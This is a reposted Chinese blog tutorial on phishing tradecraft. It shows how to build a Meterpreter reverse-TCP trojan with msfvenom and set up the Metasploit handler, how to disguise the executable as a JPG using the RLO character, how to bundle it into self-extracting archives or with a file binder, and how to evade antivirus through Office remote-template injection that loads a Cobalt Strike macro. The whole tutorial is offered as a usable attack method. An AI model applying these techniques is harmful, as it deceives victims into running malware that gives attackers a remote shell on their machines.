我是靠谱客的博主 威武荔枝,最近开发中收集的这篇文章主要介绍钓鱼篇-利用RLO隐藏exe&文件捆绑&office免杀-远程模板加载上线CS,觉得挺不错的,现在分享给大家,希望可以做个参考。

概述

RLO伪装图片执行

利用msf生成木马x.exe

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.96.128 LPORT=4444 -f exe -o x.exe

Metasploit 打开反向监听的命令 

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

下面利用RLO对x.exe的后缀进行伪装,伪装成jpg,  把jpg反写成gpj,并点击鼠标右键

 

 修改后效果如下图:

 

双击测试,成功上线。

 2.伪装压缩包上线msf

同时选中木马.exe和正常文件.exe

右击鼠标选择添加到压缩文件

按照图片红色箭头进行勾选-创建自解压格式压缩文件......

 

 

 

 

最后对生成出来的压缩包利用上面的讲的RLO进行伪装

 

 双击压缩包或解压文件尝试运行---运行成功

文件捆绑

打开文件捆绑器-选择宿主文件和捆绑的木马文件-选择图标(或自定义设置图标)  -保存并重命名

 点击捆绑软件,测试上线成功。

免杀对抗-office-远程模板加载上线CS

打开office创建一个模板并保存

重新创建一个word文件并插入CS生成出来的宏代码,保存时选择启用宏的Word模板,保存

 

然后把这个包含宏病毒的1.dotm上传到远程服务器,确保可以访问到。

下面修改这个之前保存的模板文件

改后缀为zip等压缩文件格式,点击进去

 修改settings.xml.rels 修改里面的模板路径为之前上传服务器的1.docm(包含宏病毒)的文件路径。

把模板文件的后缀zip修改为原来的docx,点击打开文档,上线成功。

最后

以上就是威武荔枝为你收集整理的钓鱼篇-利用RLO隐藏exe&文件捆绑&office免杀-远程模板加载上线CS的全部内容,希望文章能够帮你解决钓鱼篇-利用RLO隐藏exe&文件捆绑&office免杀-远程模板加载上线CS所遇到的程序开发问题。

如果觉得靠谱客网站的内容还不错,欢迎将靠谱客网站推荐给程序员好友。

本图文内容来源于网友提供,作为学习参考使用,或来自网络收集整理,版权属于原作者所有。
点赞(44)

评论列表共有 0 条评论

立即
投稿
返回
顶部